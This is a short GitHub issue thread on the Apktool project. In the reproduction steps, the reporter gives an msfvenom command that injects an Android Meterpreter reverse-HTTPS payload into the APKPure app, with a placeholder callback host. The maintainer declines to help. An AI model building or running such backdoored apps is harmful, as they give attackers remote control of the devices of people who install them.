### ISSUE TITLE
[BUG]

### ISSUE THREAD

**Issue by Impre-visible** [iBotPeaches/Apktool#2691]
### Information
1. **Apktool Version (`apktool -version`)** - 2.5.0-dirty
2. **Operating System (Mac, Linux, Window)** - Kali Linux
3. **APK From? (Playstore, ROM, Other)** - From APKPure, the apk of APKPure

### Stacktrace/Logcat

```
Include stacktrace here
```

### Steps to Reproduce
Path this command : ``sudo msfvenom -x APKPure_v3.17.29_apkpure.com.apk -p android/meterpreter/reverse_https LHOST=ip LPORT=443 -o apkpure.apk``

### APK

https://m.apkpure.com/fr/apkpure/com.apkpure.aegont.

### Questions to ask before submission
1. Have you tried `apktool d`, `apktool b` without changing anything? I use metasploit
2. If you are trying to install a modified apk, did you resign it? yes
3. Are you using the latest apktool version? no

**Comment by Impre-visible** [comment]
i update to the latest version, same error

**Comment by iBotPeaches** [comment]
Not sure how I'm supposed to help patch metasplit/msfvenom from Apktool.
